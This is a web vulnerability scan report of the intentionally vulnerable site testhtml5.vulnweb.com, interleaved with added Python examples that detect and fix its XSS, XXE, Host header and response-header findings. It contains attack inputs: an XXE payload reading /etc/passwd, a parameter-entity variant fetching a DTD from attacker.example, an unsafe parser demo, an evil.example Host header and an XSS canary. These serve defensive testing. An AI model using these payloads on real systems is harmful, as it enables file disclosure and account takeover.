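Added example, not code from this report or from the scanned application: the XML external entity finding appears under A5, A6, A7 and this category, always against the text/xml body of /forgotpw. The fix that is independent of which parser the application uses is to refuse any untrusted document that carries a DOCTYPE at all, since that is the only place external entities, parameter entities and entity-expansion bombs can be declared. The gate below is exercised against the report's own sample payload; the benign request body, the parameter-entity variant and the element names assumed for /forgotpw are constructed.

```python
import re
import xml.etree.ElementTree as ET

# The report's sample payload, as it would arrive in the text/xml body of /forgotpw.
XXE_SAMPLE = ('<?xml version="1.0" encoding="utf-8"?>'
              '<!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd">]>'
              '<xxx>&acunetixent;</xxx>')

# Constructed parameter-entity variant (out-of-band DTD fetch); the same gate must catch it.
XXE_PARAM_SAMPLE = ('<?xml version="1.0"?><!DOCTYPE x [ <!ENTITY % p SYSTEM '
                    '"http://attacker.example/evil.dtd"> %p; ]><x/>')

# Constructed legitimate request body; the element names are an assumption.
BENIGN_SAMPLE = '<?xml version="1.0"?><forgotpw><username>alice</username></forgotpw>'

_DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD."""


def _to_text(data: bytes) -> str:
    """Decode for inspection; honour a UTF-16 BOM so an encoding switch cannot hide the DTD."""
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16")
    return data.decode("utf-8", errors="replace")


def is_safe_xml(data) -> bool:
    """True when the document declares no DTD. Untrusted input never legitimately
    needs one, so rejecting it closes the whole class regardless of the parser."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    return _DOCTYPE_RE.search(_to_text(data)) is None


def parse_untrusted(data) -> ET.Element:
    """Gate first, then parse with the standard library parser."""
    if not is_safe_xml(data):
        raise UnsafeXML("DOCTYPE is not allowed in untrusted XML")
    return ET.fromstring(data)


def forgotpw_username(body) -> str:
    """What a /forgotpw handler would extract from the request (assumed element names)."""
    root = parse_untrusted(body)
    return root.findtext("username")


if __name__ == "__main__":
    print(is_safe_xml(XXE_SAMPLE), is_safe_xml(BENIGN_SAMPLE), forgotpw_username(BENIGN_SAMPLE))
```

Python's xml.etree does not resolve external entities by itself, but it is still vulnerable to entity-expansion denial of service, and other stacks (lxml with resolve_entities=True, many Java parsers) do fetch them; the DOCTYPE gate protects in both cases. If rejecting at the boundary is not possible, the defusedxml package implements the same policy inside the parser.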
Vulnerable Javascript library
You are using a vulnerable JavaScript library. One or more vulnerabilities were reported for this version of the JavaScript library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities that were reported.
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CVSS3 Base Score: 6.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: Low - Integrity Impact: Low - Availability Impact: None
CWE CWE-16
Affected item /static/app/libs/sessvars.js
Affected parameter
Variants 1
Cookie without HttpOnly flag set
This cookie does not have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser that the cookie can only be accessed by the server and not by client-side scripts. This is an important protection for session cookies, because it stops a successful XSS attack (such as the ones reported under A3) from reading the session token directly.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Origin response header indicates whether a resource can be shared, by returning the value of the Origin request header, "*", or "null".
If a website responds with Access-Control-Allow-Origin: *, the requested resource allows sharing with every origin: any website can make XHR (XMLHttpRequest) or fetch requests to your site and read the responses. Browsers do not send credentials (cookies, client certificates) on a request answered with "*", so what is exposed is content that is public or protected only by network position; the more severe variant is reflecting the Origin header together with Access-Control-Allow-Credentials: true. Using Access-Control-Allow-Origin: * is not recommended unless the resource is genuinely public.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
The HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that are supported by the web server; it represents a request for information about the communication options available on the request/response chain identified by the Request-URI. On its own it discloses only which methods the server accepts; the finding matters where that list reveals methods (PUT, DELETE, TRACE) that should not be reachable.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
(A10) Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
No alerts in this category.
Affected Items: A Detailed Report
This section provides full details of the types of vulnerabilities found according to individual affected items.
/
DOM-based cross site scripting
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser. While a traditional cross-site scripting vulnerability occurs in the server-side code, document object model (DOM) based cross-site scripting is a type of vulnerability that affects the script code running in the client's browser: untrusted data (for example from the URL or location.hash) reaches a DOM sink such as innerHTML or eval without encoding, so the server may never see the payload.
This alert belongs to the following categories: A3
CVSS Base Score: 4.4 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: None - Integrity Impact: Partial - Availability Impact: None
CWE CWE-79
Parameter Variations
5
Cookie without HttpOnly flag set
This cookie does not have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, the browser does not expose it to client-side script (for example through document.cookie); the cookie is still sent with requests to the server. This limits what an XSS payload can steal, which is why it is an important protection for session cookies.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Parameter Variations
1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from another domain outside the domain from which the resource originated. The Access-Control-Allow-Origin response header indicates whether a resource can be shared, by returning the value of the Origin request header, "*", or "null".
If a website responds with Access-Control-Allow-Origin: *, the requested resource allows sharing with every origin: any website can make XHR (XMLHttpRequest) or fetch requests to your site and read the responses. Browsers do not send credentials (cookies, client certificates) on a request answered with "*", so what is exposed is content that is public or protected only by network position; the more severe variant is reflecting the Origin header together with Access-Control-Allow-Credentials: true. Using Access-Control-Allow-Origin: * is not recommended unless the resource is genuinely public.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Parameter Variations
1
/ (64adbddee16dbd3ed58373c9670b7daa)
Password type input with auto-complete enabled
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter, when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser's saved credentials.
This alert belongs to the following categories: A6
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Parameter Variations
1
/admin
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website. This check looks for common sensitive resources like backup directories, database dumps, administration pages and temporary directories. Each one of these directories could help an attacker to learn more about the target.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Parameter Variations
1
/admin/
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name or common variations on these themes.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 7.5 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-200
Parameter Variations
1
Basic authentication over HTTP
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a user name and password when making a request. This directory is protected using Basic Authentication over an HTTP connection. With Basic Authentication the user credentials are sent in the Authorization header as a Base64-encoded "user:password" string, which is trivially reversible; because HTTPS is not used, they are exposed to anyone who can observe the traffic (packet sniffing).
This alert belongs to the following categories: A2
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Parameter Variations
1
/comment
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
/forgotpw
XML external entity injection
XML supports a facility known as "external entities", which instruct an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document.
Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY still include the replacement text, thus initiating an unexpected file open operation, an HTTP transfer, or access to whatever other system identifiers the XML processor knows how to resolve. The fix is to disable DTD processing (or at minimum external entity resolution) in any parser that handles untrusted input.
Below is a sample XML document that uses this functionality to include the contents of a local file (/etc/passwd):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "file:///etc/passwd"> ]>
<xxx>&acunetixent;</xxx>
This alert belongs to the following categories: A5, A6, A7, A9
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-611
Parameter Variations
text/xml 1
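The XXE described above (here and in the summary entry for /forgotpw), shown end to end as an added example that is not part of the scan report: a SAX parser with external general entities enabled resolves the SYSTEM entity and returns the file's contents as element text, while a parser that refuses any DTD stops at the DOCTYPE. The "secret" file is a temporary file created by the example, standing in for /etc/passwd so it runs offline; the bare path in the SYSTEM identifier is the same mechanism as the report's file:///etc/passwd URI.

```python
"""XXE demonstration: unsafe parse (external entities resolved) beside a
hardened parse (DTD refused). Added example, not part of the scan report."""
import io
import os
import tempfile
import xml.parsers.expat
import xml.sax
import xml.sax.handler

# Constructed stand-in for the first line of /etc/passwd.
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/sh"


def xxe_payload(path):
    """The report's payload, with the SYSTEM identifier pointed at `path`."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "%s"> ]>'
        '<xxx>&acunetixent;</xxx>' % path
    ).encode()


class TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data, i.e. whatever the entity expands to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_unsafe(data):
    """Parse with external general entities enabled. This was the default
    before Python 3.7.1 and is what you get when someone 'fixes' a parse
    error by turning the feature on. Returns the document's text content."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(data))
    return "".join(collector.parts)


class DTDForbidden(ValueError):
    """Raised when inbound XML carries a DOCTYPE or an entity declaration."""


def parse_safe(data):
    """Reject any DTD before expansion can happen. With no DTD there are no
    entities to expand, which closes XXE and entity-expansion DoS alike."""
    parser = xml.parsers.expat.ParserCreate()
    text = []

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden("DOCTYPE not accepted: %r" % name)

    def reject_entity(name, is_pe, value, base, sysid, pubid, notation):
        raise DTDForbidden("entity declaration not accepted: %r" % name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.CharacterDataHandler = text.append
    parser.Parse(data, True)
    return "".join(text)


def demo_leak():
    """Run both parsers against the same payload. Returns (text the unsafe
    parser produced, whether the safe parser refused the document)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-")
    try:
        with os.fdopen(fd, "w") as f:
            f.write(SECRET_CONTENT)
        payload = xxe_payload(path)
        leaked = parse_unsafe(payload)
        try:
            parse_safe(payload)
            refused = False
        except DTDForbidden:
            refused = True
    finally:
        os.unlink(path)
    return leaked, refused


if __name__ == "__main__":
    leaked, refused = demo_leak()
    print("unsafe parser returned:", repr(leaked))
    print("safe parser refused the document:", refused)
```

Refusing the DTD outright is the simplest policy and the one to prefer for APIs that only ever receive plain documents; if a DTD must be accepted, the parser has to be configured so that neither external general nor parameter entities are resolved, and that configuration has to be checked per library and version rather than assumed.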
/like
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
Host header attack
In many cases, developers trust the HTTP Host header value and use it to generate links, import scripts and even generate password reset links. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited through web-cache poisoning and by abusing alternative channels like password reset emails. Validate the Host header against an allowlist of hostnames the application actually serves, and build absolute URLs from configuration rather than from the request.
This alert belongs to the following categories: A6, A7
CVSS Base Score: 2.6 - Access Vector: Local - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CWE CWE-20
Parameter Variations
1
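The password-reset scenario from the Host header entry above, as an added example that is not from the scan report: the vulnerable version builds the link from whatever Host the client sent, the hardened version validates the host against an allowlist and builds the link from configuration. The canonical hostname, the /resetpw path, the request dictionaries and the attacker host evil.example are assumed or constructed for the demo.

```python
"""Password-reset link built from the Host header versus from configuration
plus a Host allowlist. Added example, not part of the scan report."""
from urllib.parse import quote

# Assumed: the one hostname this deployment serves, taken from configuration.
CANONICAL_BASE = "http://testhtml5.vulnweb.com"
ALLOWED_HOSTS = {"testhtml5.vulnweb.com", "testhtml5.vulnweb.com:80"}

# Constructed request headers (header names assumed already case-normalised).
VICTIM_REQUEST = {"Host": "testhtml5.vulnweb.com"}
ATTACKER_REQUEST = {"Host": "evil.example"}             # attacker-chosen Host
PROXIED_ATTACK = {"Host": "testhtml5.vulnweb.com",      # Host is fine ...
                  "X-Forwarded-Host": "evil.example"}   # ... the forwarded one is not


class UntrustedHost(ValueError):
    """The request names a host this application does not serve."""


def reset_link_vulnerable(headers, token):
    """What the report describes: the link is built from whatever Host the
    client sent, so the victim's reset token is mailed pointing at the
    attacker's site."""
    return "http://%s/resetpw?token=%s" % (headers["Host"], quote(token))


def validate_host(headers, allowed=ALLOWED_HOSTS):
    """Reject the request outright if any host-bearing header is not ours.
    X-Forwarded-Host is checked too, because frameworks configured to trust
    a proxy derive the host from it."""
    for name in ("Host", "X-Forwarded-Host"):
        value = headers.get(name)
        if value is not None and value.strip().lower() not in allowed:
            raise UntrustedHost("%s: %r" % (name, value))


def reset_link_hardened(headers, token, base_url=CANONICAL_BASE):
    """Validate the host, then build the link from configuration, never from
    the request. The token is URL-encoded so it cannot smuggle parameters."""
    validate_host(headers)
    return "%s/resetpw?token=%s" % (base_url, quote(token, safe=""))


if __name__ == "__main__":
    print("vulnerable:", reset_link_vulnerable(ATTACKER_REQUEST, "t0k3n"))
    print("hardened:  ", reset_link_hardened(VICTIM_REQUEST, "t0k3n"))
    try:
        reset_link_hardened(ATTACKER_REQUEST, "t0k3n")
    except UntrustedHost as exc:
        print("rejected:", exc)
```

Rejecting at the host check (rather than silently substituting the canonical host) is deliberate: a request carrying a foreign Host is either a misrouted request or an attack, and in both cases an error is the right answer. Web-cache poisoning through the same header is addressed by the same check, since the poisoned page is never generated.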
/report
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context, allowing the attacker to access any cookies or session tokens retained by the browser.
This alert belongs to the following categories: A3
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CWE CWE-79
Parameter Variations
1
id 1
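The three "verified" cross site scripting entries (/comment, /like and /report, all on the id parameter) rest on the same check: inject a canary and see whether the response reflects it with its markup intact. The following is an added example, not code from the report or from the scanned application; render_vulnerable and render_fixed are constructed stand-ins for the page handlers, which the report does not show.

```python
"""Verifying a reflected XSS finding the way a scanner's "verified" check
does, beside the encoding fix. Added example, not part of the scan report."""
import html

# Canary: unlikely to occur on a page by chance, and it carries every
# character that must be encoded for the reflection to be harmless.
CANARY = 'acx<img src=1 onerror="xss(1)">'


def classify_reflection(body, canary=CANARY):
    """'raw' if the canary is reflected verbatim (markup intact), 'encoded'
    if only an HTML-escaped form appears, 'absent' if it is not reflected."""
    if canary in body:
        return "raw"
    if (html.escape(canary, quote=True) in body
            or html.escape(canary, quote=False) in body):
        return "encoded"
    return "absent"


def render_vulnerable(item_id):
    """Constructed: echoes the id parameter straight into the HTML."""
    return "<h2>Item %s</h2><p>no such item</p>" % item_id


def render_fixed(item_id):
    """Constructed: the same page with the untrusted value encoded for an HTML
    text context. Attribute, URL and JavaScript contexts each need their
    own encoder; html.escape alone is not enough there."""
    return "<h2>Item %s</h2><p>no such item</p>" % html.escape(item_id, quote=True)


def verify_xss(render):
    """Drive a page-rendering function with the canary and classify the
    reflection, which is what separates a 'verified' finding from a guess."""
    return classify_reflection(render(CANARY))


if __name__ == "__main__":
    print("vulnerable handler:", verify_xss(render_vulnerable))
    print("fixed handler:     ", verify_xss(render_fixed))
```

A "raw" result on a real target is a confirmed finding; "encoded" means the value is reflected but neutralised for that context, and "absent" means the parameter did not reach the response at all and a different input should be tried.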
/static/app/libs/sessvars.js
Vulnerable Javascript library
You are using a vulnerable JavaScript library. One or more vulnerabilities were reported for this version of the JavaScript library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities that were reported.
This alert belongs to the following categories: A9
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CWE CWE-16
Parameter Variations
1
/static/app/services
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website. This check looks for common sensitive resources like backup directories, database dumps, administration pages and temporary directories. Each one of these directories could help an attacker to learn more about the target.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Parameter Variations
1
localhost
Possible virtual host found
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without requiring all services provided to use the same host name. This web server responds differently when the Host header is manipulated and various common virtual host names are tested. This could indicate that a virtual host is present.
This alert belongs to the following categories: A6
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Parameter Variations
1
Web Server
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without the --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 5.1 - Access Vector: Network - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Parameter Variations
1
Clickjacking: X-Frame-Options header missing
Clickjacking (user interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server did not return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks by ensuring that their content is not embedded into other sites; the Content-Security-Policy frame-ancestors directive is the standardised equivalent and takes precedence in browsers that support it.
This alert belongs to the following categories: A6, A7
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-693
Parameter Variations
1
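The three response-header findings in this report (the cookie without HttpOnly, the wildcard Access-Control-Allow-Origin, and the missing X-Frame-Options just above) can be checked from a captured response with one small audit. The following is an added example, not code from the report or the scanner; both responses are constructed to show a failing and a passing case, and the Secure and SameSite cookie attributes are checked alongside HttpOnly because the same fix line sets all three.

```python
"""Audit of a raw HTTP response for the header findings in this report:
cookie flags, wildcard CORS, framing protection. Added example, not part of
the scan report."""

# Constructed: roughly what a response carrying all three findings looks like.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=7f3a9c; Path=/\r\n"
    "Access-Control-Allow-Origin: *\r\n"
    "\r\n"
    "<html></html>"
)

# Constructed: the same response with the findings fixed.
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: session=7f3a9c; Path=/; HttpOnly; Secure; SameSite=Lax\r\n"
    "X-Frame-Options: DENY\r\n"
    "Content-Security-Policy: frame-ancestors 'none'\r\n"
    "\r\n"
    "<html></html>"
)


def parse_headers(raw):
    """Return [(name_lowercase, value)] for a raw HTTP/1.x response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def audit_cookie(set_cookie):
    """Flag a Set-Cookie value that lacks HttpOnly, Secure or SameSite."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
    return ["cookie %s: %s missing" % (name, flag)
            for flag in ("httponly", "secure", "samesite") if flag not in attrs]


def framing_restricted(headers):
    """True if X-Frame-Options or a CSP frame-ancestors directive is present."""
    for name, value in headers:
        if name == "x-frame-options" and value.lower() in ("deny", "sameorigin"):
            return True
        if name == "content-security-policy" and "frame-ancestors" in value.lower():
            return True
    return False


def audit_response(raw):
    """Return a list of finding strings; an empty list means none of the
    three issues is present."""
    headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            findings.extend(audit_cookie(value))
        elif name == "access-control-allow-origin" and value == "*":
            # '*' lets any origin read the response. Browsers send no
            # credentials with it, so what leaks is content that is public
            # or guarded only by network position.
            findings.append("Access-Control-Allow-Origin is '*'")
    if not framing_restricted(headers):
        findings.append("no X-Frame-Options / CSP frame-ancestors: page can be framed")
    return findings


if __name__ == "__main__":
    for finding in audit_response(WEAK_RESPONSE):
        print("WEAK:", finding)
    print("hardened findings:", audit_response(HARDENED_RESPONSE))
```

Run against a real capture, the same audit applies to every Set-Cookie line in the response, not only the session cookie; and a response that reflects the request's Origin header together with Access-Control-Allow-Credentials: true should be treated as more serious than the wildcard case flagged here, since that combination does expose authenticated content.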
OPTIONS method is enabled
The HTTP OPTIONS method is enabled on this web server. The OPTIONS method provides a list of the methods that are supported by the web server; it represents a request for information about the communication options available on the request/response chain identified by the Request-URI. On its own it discloses only which methods the server accepts; the finding matters where that list reveals methods (PUT, DELETE, TRACE) that should not be reachable.
This alert belongs to the following categories: A5, A6, A9
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Parameter Variations
1
Scanned items (coverage report)
http://testhtml5.vulnweb.com/
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
/ Path Fragment
Input scheme 2
Input name Input type
Host HTTP Header
http://testhtml5.vulnweb.com:80/login
No vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
password URL encoded POST
username URL encoded POST
http://testhtml5.vulnweb.com/static
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/img/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/css/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/css/style.css
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/
Vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/app.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/libs/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/libs/sessvars.js
Vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/post.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/controllers/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/controllers/controllers.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/services/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/services/itemsService.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/popular.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/latest.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/carousel.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/archive.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/about.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/contact.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/app/partials/redir.html
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/static/scr/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/logout
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/ajax
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/ajax/popular
No vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
offset URL encoded GET
http://testhtml5.vulnweb.com/ajax/latest
No vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
offset URL encoded GET
http://testhtml5.vulnweb.com/ajax/archive
No vulnerabilities have been identified for this URL
No input(s) found for this URL
http://testhtml5.vulnweb.com/forgotpw
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
text/xml Custom POST
forgot.username#text XML
http://testhtml5.vulnweb.com/like
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/comment
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/report
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name Input type
id URL encoded GET
http://testhtml5.vulnweb.com/admin/
Vulnerabilities have been identified for this URL
No input(s) found for this URL